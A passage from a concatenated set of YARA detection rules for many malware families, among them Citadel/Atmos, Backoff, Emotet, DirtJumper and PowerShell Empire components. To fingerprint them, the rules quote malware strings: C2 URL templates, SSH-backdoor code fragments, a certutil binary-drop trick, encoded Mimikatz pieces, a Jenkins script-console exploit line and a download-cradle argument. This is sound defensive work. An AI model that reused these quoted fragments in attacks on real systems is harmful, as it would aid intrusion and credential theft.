ascii $TS7 = "X-TS-Header-Referer: %S" wide ascii $TS8 = "X-TS-Header-AcceptEncoding: %S" wide ascii $TS9 = "X-TS-Header-AcceptLanguage: %S" wide ascii $TS10 = "X-TS-Header-UserAgent: %S" wide ascii // Hidden VNC identifiers $VNC1 = "_hvnc_init@4" wide ascii $VNC2 = "_hvnc_uninit@0" wide ascii $VNC3 = "_hvnc_start@8" wide ascii $VNC4 = "_hvnc_stop@0" wide ascii $VNC5 = "_hvnc_wait@0" wide ascii $VNC6 = "_hvnc_work@0" wide ascii // Browsers identifiers $WB1 = "nspr4.dll" wide ascii $WB2 = "nss3.dll" wide ascii $WB3 = "chrome.dll" wide ascii $WB4 = "Internet Explorer" wide ascii $WB5 = "Firefox" wide ascii $WB6 = "Chrome" wide ascii condition: ($MZ at 0 and $LKEY) and ( (5 of ($TS*) and all of ($WB*)) or (3 of ($VNC*) and all of ($WB*))) and filesize < 300KB // Standard size (raw from builder) should be arround ~264kb // Remove the above line if you want to trig also on memory dumps, etc... } rule Atmos_Packed_Malware { meta: description = "Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer" author = "xylitol@temari.fr" reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html" date = "20/08/2016" // May only the challenge guide you strings: $MZ = {4D 5A} // Entry point identifier with CreateThread pointer in '??' $a = {55 8B EC 83 EC 0C 53 56 8B 35 ?? ?? ?? 00 57 33 DB BF 00 28 00 00} // End of main proc with sleep value in '??' and api call to sleep in '??' $b = {68 ?? ?? ?? ?? FF 15 ?? ?? ?? 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3} // API String identifier (ShellExecuteExW, SHELL32.dll, GetUserNameExW, Secur32.dll) $c = {53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65} $d = {74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00} // New Thread identifier $e = {55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 ?? 6A FF FF 75 08 FF 15 ?? ?? ?? 00} condition: all of them and filesize < 300KB // Standard size (raw from builder) should be arround ~264kb // Remove the above line if you want to trig also on memory dumps, etc... } rule Atmos_Builder { meta: description = "Generic signature for Hacktool.Atmos.Builder cracked version" author = "xylitol@temari.fr" reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html" date = "20/08/2016" // May only the challenge guide you strings: // Check for the presence of MZ, kutuzov license identifier, and good hardware ID $MZ = {4D 5A} $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" wide ascii $HWID = "D19FC0FB14BE23BCF35DA427951BB5AE" wide ascii // Builder strings identifiers $s1 = "url_loader=%S" wide ascii $s2 = "url_webinjects=%S" wide ascii $s3 = "url_tokenspy=%S" wide ascii $s4 = "file_webinjects=%S" wide ascii $s5 = "moneyparser.enabled=%u" wide ascii $s6 = "enable_luhn10_post=%u" wide ascii $s7 = "insidevm_enable=%u" wide ascii $s8 = "disable_antivirus=%u" wide ascii condition: $MZ at 0 and $LKEY and $HWID and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule custom_ssh_backdoor_server { meta: description = "Custome SSH backdoor based on python and paramiko - file server.py" author = "Florian Roth" reference = "https://goo.gl/S46L3o" date = "2015-05-14" hash = "0953b6c2181249b94282ca5736471f85d80d41c9" strings: $s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii $s3 = "chan.send(command)" fullword ascii $s4 = "print '[-] SSH negotiation failed.'" fullword ascii $s5 = "except paramiko.SSHException, x:" fullword ascii condition: filesize < 10KB and 5 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule backoff { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-21" description = "Identify Backoff" strings: $s1 = "&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s" $s2 = "%s @ %s" $s3 = "Upload KeyLogs" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule BangatCode { meta: description = "Bangat code features" author = "Seth Hardy" last_modified = "2014-07-10" strings: // dec [ebp + procname], push eax, push edx, call get procaddress $ = { FE 4D ?? 8D 4? ?? 50 5? FF } condition: any of them } rule BangatStrings { meta: description = "Bangat Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-10" strings: $lib1 = "DreatePipe" $lib2 = "HetSystemDirectoryA" $lib3 = "SeleaseMutex" $lib4 = "DloseWindowStation" $lib5 = "DontrolService" $file = "~hhC2F~.tmp" $mc = "~_MC_3~" condition: all of ($lib*) or $file or $mc } rule Bangat { meta: description = "Bangat" author = "Seth Hardy" last_modified = "2014-07-10" condition: BangatCode or BangatStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Batel_export_function { meta: author = "@j0sm1" date = "2016/10/15" description = "Batel backdoor" reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-091923-4146-99" filetype = "binary" condition: pe.exports("run_shell") and pe.imports("kernel32.dll","GetTickCount") and pe.imports("kernel32.dll","IsDebuggerPresent") and pe.imports("msvcr100.dll","_crt_debugger_hook") and pe.imports("kernel32.dll","TerminateProcess") and pe.imports("kernel32.dll","UnhandledExceptionFilter") } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule BlackRev { meta: author = "Dennis Schwarz" date = "2013-05-21" description = "Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/" origin = "https://github.com/arbor/yara/blob/master/blackrev.yara" strings: $base1 = "http" $base2 = "simple" $base3 = "loginpost" $base4 = "datapost" $opt1 = "blackrev" $opt2 = "stop" $opt3 = "die" $opt4 = "sleep" $opt5 = "syn" $opt6 = "udp" $opt7 = "udpdata" $opt8 = "icmp" $opt9 = "antiddos" $opt10 = "range" $opt11 = "fastddos" $opt12 = "slowhttp" $opt13 = "allhttp" $opt14 = "tcpdata" $opt15 = "dataget" condition: all of ($base*) and 5 of ($opt*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule BlackWorm { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-05-20" description = "Identify BlackWorm" strings: $str1 = "m_ComputerObjectProvider" $str2 = "MyWebServices" $str3 = "get_ExecutablePath" $str4 = "get_WebServices" $str5 = "My.WebServices" $str6 = "My.User" $str7 = "m_UserObjectProvider" $str8 = "DelegateCallback" $str9 = "TargetMethod" $str10 = "000004b0" wide $str11 = "Microsoft Corporation" wide condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule BoousetCode { meta: description = "Boouset code tricks" author = "Seth Hardy" last_modified = "2014-06-19" strings: $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 } condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Bublik { meta: author="Kevin Falcoz" date="29/09/2013" description="Bublik Trojan Downloader" strings: $signature1={63 6F 6E 73 6F 6C 61 73} $signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69} condition: $signature1 and $signature2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Win32_Buzus_Softpulse { meta: description = "Trojan Buzus / Softpulse" author = "Florian Roth" date = "2015-05-13" hash = "2f6df200e63a86768471399a74180466d2e99ea9" score = 75 strings: $x1 = "pi4izd6vp0.com" fullword ascii $s1 = "SELECT * FROM Win32_Process" fullword wide $s4 = "CurrentVersion\\Uninstall\\avast" fullword wide $s5 = "Find_RepeatProcess" fullword ascii $s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" fullword wide $s7 = "myapp.exe" fullword ascii $s14 = "/c ping -n 1 www.google" wide condition: uint16(0) == 0x5a4d and ( ( $x1 and 2 of ($s*) ) or all of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule CAP_HookExKeylogger { meta: author = "Brian C. Bell -- @biebsmalwareguy" reference = "https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar" strings: $str_Win32hookapi = "SetWindowsHookEx" nocase $str_Win32llkey = "WH_KEYBOARD_LL" nocase $str_Win32key = "WH_KEYBOARD" nocase condition: 2 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule ChickenDOS { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Win32-variant of Chicken ident for both dropper and dropped file" source = "https://github.com/arbor/yara/blob/master/chicken.yara" strings: $pdb1 = "\\Chicken\\Release\\svchost.pdb" $pdb2 = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb" $str2 = "fake.cf" $str3 = "8.8.8.8" $str4 = "Processor(%d)\\" $str5 = "DbProtectSupport" $str1 = "dm1712/`jvpnpkte/bpl" $str6 = "InstallService NPF %d" $str7 = "68961" $str8 = "InstallService DbProtectSupport %d" $str9 = "C:\\Program Files\\DbProtectSupport\\npf.sys" condition: ($pdb1 or $pdb2) and 5 of ($str*) } rule ChickenDOS_Linux { meta: author = "Jason Jones <jasonjones@arbor.net>" description = "Linux-variant of Chicken ident for both dropper and dropped file" source = "https://github.com/arbor/yara/blob/master/chicken.yara" strings: $cfg = "fake.cfg" $file1 = "ThreadAttack.cpp" $file2 = "Fake.cpp" $str1 = "dns_array" $str2 = "DomainRandEx" $str3 = "cpu %llu %llu %llu %llu" $str4 = "[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %s" ascii condition: $cfg and all of ($file*) and 3 of ($str*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule citadel13xy { meta: author = "Jean-Philippe Teissier / @Jipe_" description = "Citadel 1.5.x.y trojan banker" date = "2013-01-12" version = "1.0" filetype = "memory" strings: $a = "Coded by BRIAN KREBS for personnal use only. I love my job & wife." $b = "http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php" $c = "%BOTID%" $d = "%BOTNET%" $e = "cit_video.module" $f = "bc_remove" $g = "bc_add" $ggurl = "http://www.google.com/webhp" condition: 3 of them } rule Citadel_Malware { meta: author = "xylitol@temari.fr" date = "2015-10-08" description = "Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0" // May only the challenge guide you strings: $s1 = "Coded by BRIAN KREBS for personal use only. I love my job & wife" wide ascii $s2 = "nss3.dll" wide ascii $h1 = {8B C7 EB F5 55 8B EC} $h2 = {55 8B EC 83 EC 0C 8A 82 00 01 00 00} $h3 = {3D D0 FF 1F 03 77 ?? 83 7D} $h4 = {83 F9 66 74 ?? 83 F9 6E 74 ?? 83 F9 76 74 ?? 83 F9 7A} condition: all of ($s*) and 2 of ($h*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Generic Cloaking Florian Roth BSK Consulting GmbH License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/ */ rule Binary_Drop_Certutil { meta: description = "Drop binary as base64 encoded cert trick" author = "Florian Roth" reference = "https://goo.gl/9DNn8q" date = "2015-07-15" score = 70 strings: $s0 = "echo -----BEGIN CERTIFICATE----- >" ascii $s1 = "echo -----END CERTIFICATE----- >>" ascii $s2 = "certutil -decode " ascii condition: filesize < 10KB and all of them } rule StegoKatz { meta: description = "Encoded Mimikatz in other file types" author = "Florian Roth" reference = "https://goo.gl/jWPBBY" date = "2015-09-11" score = 70 strings: $s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii $s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii condition: filesize < 1000KB and 1 of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule CookiesStrings { meta: description = "Cookies Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-20" strings: $zip1 = "ntdll.exePK" $zip2 = "AcroRd32.exePK" $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a" $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a" $exe1 = "Leave GetCommand!" $exe2 = "perform exe success!" $exe3 = "perform exe failure!" $exe4 = "Entry SendCommandReq!" $exe5 = "Reqfile not exist!" $exe6 = "LeaveDealUpfile!" $exe7 = "Entry PostData!" $exe8 = "Leave PostFile!" $exe9 = "Entry PostFile!" $exe10 = "\\unknow.zip" wide ascii $exe11 = "the url no respon!" condition: (2 of ($zip*)) or (2 of ($exe*)) } rule Cookies { meta: description = "Cookies" author = "Seth Hardy" last_modified = "2014-06-20" condition: CookiesStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule CorkowDLL { meta: description = "Rule to detect the Corkow DLL files" reference = "IB-Group | http://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf" strings: $mz = { 4d 5a } $binary1 = {60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3} $binary2 = {(FF75??|53)FF7510FF750CFF7508E8????????[3-9]C9C20C 00} $export1 = "Control_RunDLL" $export2 = "ServiceMain" $export3 = "DllGetClassObject" condition: ($mz at 0) and ($binary1 and $binary2) and any of ($export*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule cxpidStrings { meta: description = "cxpid Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-23" strings: $ = "/cxpid/submit.php?SessionID=" $ = "/cxgid/" $ = "E21BC52BEA2FEF26D005CF" $ = "E21BC52BEA39E435C40CD8" $ = " -,L-,O+,Q-,R-,Y-,S-" condition: any of them } rule cxpidCode { meta: description = "cxpid code features" author = "Seth Hardy" last_modified = "2014-06-23" strings: $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 } condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Cythosia { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-03-21" description = "Identify Cythosia" strings: $str1 = "HarvesterSocksBot.Properties.Resources" wide condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule DDosTf { meta: author = "benkow_ - MalwareMustDie" reference = "http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html" description = "Rule to detect ELF.DDosTf infection" strings: $st0 = "ddos.tf" $st1 = {E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 49 4E 54 56 4C E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPINTVL*/ $st2 = {E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 43 4E 54 E9 94 99 E8 AF AF EF BC 9A 00} /*TCP_KEEPCNT*/ $st3 = "Accept-Language: zh" $st4 = "%d Kb/bps|%d%%" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Derkziel { meta: description = "Derkziel info stealer (Steam, Opera, Yandex, ...)" author = "The Malware Hunter" filetype = "pe" date = "2015-11" md5 = "f5956953b7a4acab2e6fa478c0015972" site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972" reference = "https://bhf.su/threads/137898/" strings: $drz = "{!}DRZ{!}" $ua = "User-Agent: Uploador" $steam = "SteamAppData.vdf" $login = "loginusers.vdf" $config = "config.vdf" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Dexter_Malware { meta: description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b" author = "Florian Roth" reference = "http://goo.gl/oBvy8b" date = "2015/02/10" score = 70 strings: $s0 = "Java Security Plugin" fullword wide $s1 = "%s\\%s\\%s.exe" fullword wide $s2 = "Sun Java Security Plugin" fullword wide $s3 = "\\Internet Explorer\\iexplore.exe" fullword wide condition: all of them } rule dexter_strings { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-09-10" description = "Identify Dexter POSGrabber" strings: $s1 = "UpdateMutex:" $s2 = "response=" $s3 = "page=" $s4 = "scanin:" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule diamond_fox { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2015-08-22" description = "Identify DiamondFox" strings: $s1 = "UPDATE_B" $s2 = "UNISTALL_B" $s3 = "S_PROTECT" $s4 = "P_WALLET" $s5 = "GR_COMMAND" $s6 = "FTPUPLOAD" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule DirtJumper_drive { meta: author = "Jason Jones <jasonjones@arbor.net>" date = "2013-08-26" description = "Identify first version of drive DDoS malware" source = "https://github.com/arbor/yara/blob/master/drive.yara" strings: $cmd1 = "-get" fullword $cmd2 = "-ip" fullword $cmd3 = "-ip2" fullword $cmd4 = "-post1" fullword $cmd5 = "-post2" fullword $cmd6 = "-udp" fullword $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]" $str2 = "-timeout" fullword $str3 = "-thread" fullword $str4 = " Local; ru) Presto/2.10.289 Version/" $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT" $newver1 = "-icmp" $newver2 = "<xmp>" condition: 4 of ($cmd*) and all of ($str*) and not any of ($newver*) } rule DirtJumper_drive2 { meta: author = "Jason Jones <jasonjones@arbor.net>" date = "2013-08-26" description = "Identify newer version of drive DDoS malware" source = "https://github.com/arbor/yara/blob/master/drive2.yara" strings: $cmd1 = "-get" fullword $cmd2 = "-ip" fullword $cmd3 = "-ip2" fullword $cmd4 = "-post1" fullword $cmd5 = "-post2" fullword $cmd6 = "-udp" fullword $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]" $str2 = "-timeout" fullword $str3 = "-thread" fullword $str4 = " Local; ru) Presto/2.10.289 Version/" $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT" $newver1 = "-icmp" $newver2 = "-byte" $newver3 = "-long" $newver4 = "<xmp>" condition: 4 of ($cmd*) and all of ($str*) and all of ($newver*) } rule DirtJumper_drive3 { meta: author = "Jason Jones <jasonjones@arbor.net>" date = "2014-03-17" description = "Identify version of Drive DDoS malware using compromised sites" source = "https://github.com/arbor/yara/blob/master/drive3.yara" strings: $cmd1 = "-get" fullword $cmd2 = "-ip" fullword $cmd3 = "-ip2" fullword $cmd4 = "-post1" fullword $cmd5 = "-post2" fullword $cmd6 = "-udp" fullword $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]" $str2 = "-timeout" fullword $str3 = "-thread" fullword $str4 = " Local; ru) Presto/2.10.289 Version/" $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT" $newver1 = "-icmp" $newver2 = "-byte" $newver3 = "-long" $drive3 = "99=1" condition: 4 of ($cmd*) and all of ($str*) and all of ($newver*) and $drive3 } rule eicar { meta: description = "Rule to detect Eicar pattern" author = "Marc Rivero | @seifreed" hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" strings: $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Trj_Elex_Installer_NSIS { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex Installer NSIS" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = {4e 75 6c 6c 73 6f 66 74 } $str2 = {b7 a2 d5 dc 0c d6 a6 3a} condition: ($mz at 0) and ($str1 at 0xA008) and ($str2 at 0x1c8700) } rule Trj_Elex_Installer { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex Installer" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = {65 00 76 00 65 00 72 00 79 00 74 00 68 00 69 00 6e 00 67 00} $str2 = "IsWow64Process" $str3 = "SSFK" condition: ($mz at 0) and ($str1) and ($str2) and ($str3) } rule Trj_Elex_Service32 { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex Service 32 bits" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = "http://xa.xingcloud.com/v4/sof-everything/" $str2 = "http://www.mysearch123.com" $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma" condition: (pe.machine == pe.MACHINE_I386) and ($mz at 0) and ($str1) and ($str2) and ($str3) } rule Trj_Elex_Service64 { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex Service 64 bits" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = "http://xa.xingcloud.com/v4/sof-everything/" $str2 = "http://www.mysearch123.com" $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma" condition: (pe.machine == pe.MACHINE_AMD64) and ($mz at 0) and ($str1) and ($str2) and ($str3) } rule Trj_Elex_Dll32 { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex DLL 32 bits" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = {59 00 72 00 72 00 65 00 68 00 73 00} $str2 = "RookIE/1.0" condition: (pe.machine == pe.MACHINE_I386) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2) } rule Trj_Elex_Dll64 { meta: author = "Centro Criptológico Nacional (CCN)" description = "Elex DLL 64 bits" ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" strings: $mz = { 4d 5a } $str1 = {59 00 72 00 72 00 65 00 68 00 73 00} $str2 = "RookIE/1.0" condition: (pe.machine == pe.MACHINE_AMD64) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule elknot_xor : malware { meta: author = "liuya@360.cn" date = "2016-04-25" description = "elknot/Billgates variants with XOR like C2 encryption scheme" reference = "http://liuya0904.blogspot.tw/2016/04/new-elknotbillgates-variant-with-xor.html" sample = "474429d9da170e733213940acc9a2b1c, 2579aa65a28c32778790ec1c673abc49" strings: //md5=474429d9da170e733213940acc9a2b1c /* seg000:08130801 68 00 09 13 08 push offset dword_8130900 seg000:08130806 83 3D 30 17 13 08 02 cmp ds:dword_8131730, 2 seg000:0813080D 75 07 jnz short loc_8130816 seg000:0813080F 81 04 24 00 01 00 00 add dword ptr [esp], 100h seg000:08130816 loc_8130816: seg000:08130816 50 push eax seg000:08130817 E8 15 00 00 00 call sub_8130831 seg000:0813081C E9 C8 F6 F5 FF jmp near ptr 808FEE9h */ $decrypt_c2_func_1 = {08 83 [5] 02 75 07 81 04 24 00 01 00 00 50 e8 [4] e9} // md5=2579aa65a28c32778790ec1c673abc49 /* .rodata:08104D20 E8 00 00 00 00 call $+5 .rodata:08104D25 87 1C 24 xchg ebx, [esp+4+var_4] ; .rodata:08104D28 83 EB 05 sub ebx, 5 .rodata:08104D2B 8D 83 00 FD FF FF lea eax, [ebx-300h] .rodata:08104D31 83 BB 10 CA 02 00 02 cmp dword ptr [ebx+2CA10h], 2 .rodata:08104D38 75 05 jnz short loc_8104D3F .rodata:08104D3A 05 00 01 00 00 add eax, 100h .rodata:08104D3F loc_8104D3F: .rodata:08104D3F 50 push eax .rodata:08104D40 FF 74 24 10 push [esp+8+strsVector] */ $decrypt_c2_func_2 = {e8 00 00 00 00 87 [2] 83 eb 05 8d 83 [4] 83 bb [4] 02 75 05} condition: 1 of ($decrypt_c2_func_*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Emotets{ meta: author = "pekeinfo" date = "2017-10-18" description = "Emotets" strings: $mz = { 4d 5a } $cmovnz={ 0f 45 fb 0f 45 de } $mov_esp_0={ C7 04 24 00 00 00 00 89 44 24 0? } $_eax={ 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 } condition: ($mz at 0 and $_eax in( 0x2854..0x4000)) and ($cmovnz or $mov_esp_0) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Rule Set ----------------------------------------------------------------- */ rule Empire_Invoke_MetasploitPayload { meta: description = "Detects Empire component - file Invoke-MetasploitPayload.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54" strings: $s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii $s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 9KB and 1 of them ) or all of them } rule Empire_Exploit_Jenkins { meta: description = "Detects Empire component - file Exploit-Jenkins.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729" strings: $s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii $s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii $s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii condition: ( uint16(0) == 0x6620 and filesize < 7KB and 1 of them ) or all of them } rule Empire_Get_SecurityPackages { meta: description = "Detects Empire component - file Get-SecurityPackages.ps1" author = "Florian Roth" reference = "https://github.com/adaptivethreat/Empire" date = "2016-11-05" hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1" strings: $s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii $s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 20KB and 1 of them ) or all of them } rule Empire_Invoke_PowerDump { meta: description = "Detects Empire component - file 